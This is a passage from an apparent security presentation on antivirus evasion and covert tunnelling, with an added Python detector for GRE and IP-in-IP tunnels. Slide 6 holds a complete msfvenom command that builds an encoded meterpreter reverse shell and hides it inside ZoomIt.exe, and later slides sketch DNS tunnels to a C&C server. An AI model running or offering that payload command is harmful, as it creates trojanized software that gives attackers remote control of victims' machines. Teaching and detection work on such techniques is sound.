6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f exe -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe
https://www.virustotal.com/en/file/d8b9f086aefb89d1e05bc0e86a254570430af6ae844e1336d7ce4d7aaceb73bd/analysis/1471899934
17. What is protocol tunnelling?
Basically, transporting a protocol inside another protocol, like GRE (IP protocol 47), which transports other IP protocols such as IPv4 (protocol 4), TCP (protocol 6) etc.
For instance, a DNS packet looks like this:
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | Data :::::::::::::::::::::::::::::: |
+------------------------------------------------------------+
If we use DNS as the transport protocol, we can place a TCP packet inside it in the following way:
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | | IP | TCP | HTTP | Data :::::::::| |
+------------------------------------------------------------+
18. Basic Tunnelling
Generic Routing Encapsulation (GRE) is a tunneling protocol developed by Cisco Systems that can encapsulate a wide variety of network layer protocols inside virtual point-to-point links over an Internet Protocol network. [Wikipedia]
+------------------------------------+
| MAC | IP | GRE | IP | ICMP | DATA |
+------------------------------------+
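As an added example (not part of the deck), a small Python header walker for the stack drawn on slides 17 and 18: it starts at the outer IP header, follows GRE (protocol 47) and IP-in-IP (protocol 4), and reports the encapsulation chain, which is what a sensor needs in order to flag a tunnel on a segment where none is expected. The sample packets are constructed inline using the demo addresses from the deck; the MAC layer is omitted, and DNS-carried payloads are not followed because they have no fixed header to parse.

```python
import socket
import struct

PROTO_NAMES = {1: "ICMP", 4: "IPv4", 6: "TCP", 17: "UDP", 47: "GRE"}  # numbers named on the slides
ETHERTYPE_IPV4 = 0x0800

def ipv4_header(proto, payload_len, src="172.16.52.203", dst="172.16.52.216"):
    # Constructed minimal IPv4 header (IHL=5, checksum left zero).
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto,
                       0, socket.inet_aton(src), socket.inet_aton(dst))

def parse_ipv4(buf):  # -> (protocol number, payload), honouring IHL
    ihl = (buf[0] & 0x0F) * 4
    return buf[9], buf[ihl:]

def parse_gre(buf):  # -> (inner ethertype, payload); skips RFC 2784/2890 optional fields
    flags, ethertype = struct.unpack("!HH", buf[:4])
    hdr_len = 4 + (4 if flags & 0x8000 else 0)   # C bit: checksum + reserved1
    hdr_len += (4 if flags & 0x2000 else 0)      # K bit: key
    hdr_len += (4 if flags & 0x1000 else 0)      # S bit: sequence number
    return ethertype, buf[hdr_len:]

def encapsulation_chain(buf):
    """Walk headers from the outer IP header, following GRE (47) and IP-in-IP (4)."""
    chain = []
    while True:
        proto, payload = parse_ipv4(buf)
        chain.append("IP")
        if proto == 47:
            chain.append("GRE")
            ethertype, payload = parse_gre(payload)
            if ethertype != ETHERTYPE_IPV4:  # only IPv4 inside GRE is followed here
                chain.append("0x%04x" % ethertype)
                return chain
        elif proto != 4:  # not a carrier we follow: innermost layer reached
            chain.append(PROTO_NAMES.get(proto, str(proto)))
            return chain
        buf = payload

def is_tunnelled(buf):  # more than one stacked IP header => GRE or IP-in-IP tunnel
    return encapsulation_chain(buf).count("IP") > 1

# Constructed samples (no MAC layer): the GRE/ICMP case from the slide, IP-in-IP carrying TCP, plain UDP.
_icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + b"ping"
_inner_icmp = ipv4_header(1, len(_icmp)) + _icmp
SAMPLE_GRE = ipv4_header(47, 4 + len(_inner_icmp)) + struct.pack("!HH", 0, ETHERTYPE_IPV4) + _inner_icmp
_tcp = struct.pack("!HHIIBBHHH", 1234, 80, 0, 0, 0x50, 0x02, 8192, 0, 0)
_inner_tcp = ipv4_header(6, len(_tcp)) + _tcp
SAMPLE_IPIP = ipv4_header(4, len(_inner_tcp)) + _inner_tcp
SAMPLE_PLAIN = ipv4_header(17, 8) + struct.pack("!HHHH", 5353, 53, 8, 0)
```

Feeding `encapsulation_chain` the IP payload of each frame from a capture and alerting on `is_tunnelled` gives a first-pass GRE/IP-in-IP detector; DNS and ICMP tunnels (slides 19 onward) need content heuristics instead.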
19. IP over ICMP
IP over DNS
DNS Tunnel capable malware
Tunnelling demos
[ICMP tunnel demo diagram: 172.16.52.203 --ICMP--> 172.16.52.216 --HTTP--> Internet]
[DNS tunnel demo diagram: 172.16.52.216 --DNS--> Local DNS Server --DNS--> Internet --> Auth. DNS Server --HTTP--> C&C]
22. Custom Tor Configurations
meek is a pluggable transport, an obfuscation layer for Tor designed to evade Internet censorship.
Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian and security by isolation.
Tor is a connection-oriented anonymizing communication service.
SocksPort:443 defines which port is going to be used for the SOCKS proxy.
[Diagram: HTTPS Client --> Custom Tor --> Tor --> Internet]
[Diagram: Client --> Whonix GW --> Tor --> Internet]